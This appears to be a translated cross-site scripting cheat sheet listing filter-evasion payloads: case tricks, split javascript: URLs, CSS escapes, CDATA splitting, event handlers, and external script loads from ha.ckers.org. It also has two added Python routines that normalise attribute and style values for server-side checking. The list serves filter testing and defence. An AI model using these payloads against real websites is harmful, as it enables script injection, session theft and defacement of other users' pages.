1. Change the letter case of the characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade a regular-expression check

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use a different file extension instead of .js

<script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tab or newline characters to evade

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line
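A server-side check on src/href/url() values has to normalise the value the way the browser does before it looks at the scheme: decode character references (item 8 below), drop the tab and newline characters of item 6 and ignore letter case (item 1). The Python below is an added example, not code from the original post; it uses an allow-list of schemes instead of searching for the string javascript:, and it checks only the scheme, so it says nothing about where a permitted http(s) resource is loaded from (item 4).

```python
import html
import re

# Added example (not code from the original post). It normalises a URL-valued
# attribute (src, href, url(...)) the way a browser does before it looks at the
# scheme, so the letter-case trick of item 1, the tab/newline trick of item 6 and
# the HTML-entity encoding of item 8 cannot hide "javascript:" from the check.

SCHEME_RE = re.compile(r'^([a-zA-Z][a-zA-Z0-9+.\-]*):')
ALLOWED_SCHEMES = frozenset({'http', 'https', 'mailto'})  # allow-list, not block-list


def normalize_url(value: str) -> str:
    """Decode character references, then apply the WHATWG URL pre-processing."""
    text = html.unescape(value)                 # &#x6A; or &#106 (no ';') -> 'j'
    text = re.sub(r'^[\x00-\x20]+|[\x00-\x20]+$', '', text)  # strip leading/trailing C0 + space
    return re.sub(r'[\t\n\r]', '', text)        # tab, LF and CR are removed anywhere


def url_scheme(value: str):
    """Scheme in lower case, or None when the value parses as a relative URL."""
    m = SCHEME_RE.match(normalize_url(value))
    return m.group(1).lower() if m else None


def url_is_allowed(value: str) -> bool:
    """Accept relative URLs and allow-listed schemes; reject everything else."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


if __name__ == '__main__':
    # Constructed samples: the item 6 and item 14 values from the list, a mixed-case
    # variant, an entity-encoded variant (item 8) and two harmless values for contrast.
    samples = [
        "jav\tascr\nipt:alert('XSS3')",
        "javascript:alert('XSS29')",
        " JaVaScRiPt:alert('XSS')",
        "&#x6A;avascript:alert('XSS')",
        "t.js",
        "https://example.com/app.js",
    ]
    for s in samples:
        verdict = 'allow' if url_is_allowed(s) else 'REJECT'
        print(f"{verdict:6}  scheme={url_scheme(s)!r}  {s!r}")
```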
7. Use "\" (and CSS comments) to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
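The backslash and comment tricks above defeat a check that looks for the literal string expression( because the browser's CSS parser decodes them first. The Python below is an added example, not code from the original post: it performs the same decoding (string-aware comment stripping, then CSS backslash escapes) before inspecting a style value, so the check sees what the browser will see.

```python
import re

# Added example (not code from the original post). It undoes the CSS tricks of
# item 7 (backslash escapes and /* */ comments) so that a server-side check on a
# style value sees "expression(" or "javascript:" exactly as the browser's CSS
# parser will. Comments are stripped only outside quoted strings: a "/*" inside a
# string is string content, not a comment start (see the last example above).

CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)', re.DOTALL)
DANGEROUS = ('expression(', 'javascript:', '@import')

def strip_css_comments(value: str) -> str:
    out, i, n, quote = [], 0, len(value), None
    while i < n:
        ch = value[i]
        if quote:                                  # inside "..." or '...'
            out.append(ch)
            if ch == '\\' and i + 1 < n:           # keep an escaped character verbatim
                out.append(value[i + 1])
                i += 1
            elif ch == quote:
                quote = None
        elif ch in '"\'':
            quote = ch
            out.append(ch)
        elif value.startswith('/*', i):
            end = value.find('*/', i + 2)
            i = n if end < 0 else end + 1          # an unterminated comment eats the rest
        else:
            out.append(ch)
        i += 1
    return ''.join(out)

def decode_css_escapes(value: str) -> str:
    def repl(m):
        if m.group(1):                             # \HH..HH -> that code point
            code = int(m.group(1), 16)
            return chr(code) if 0 < code <= 0x10FFFF else '\ufffd'
        return m.group(2)                          # \x -> x, so expre\ssion -> expression
    return CSS_ESCAPE.sub(repl, value)

def normalize_css(value: str) -> str:
    text = decode_css_escapes(strip_css_comments(value))
    text = re.sub(r'[\x00-\x20\x7f]', '', text)    # drop whitespace and control characters
    return text.lower()

def style_is_dangerous(value: str) -> bool:
    """True when the normalised style still contains a construct from item 7's list."""
    return any(token in normalize_css(value) for token in DANGEROUS)
```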
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and let the browser reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Set a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>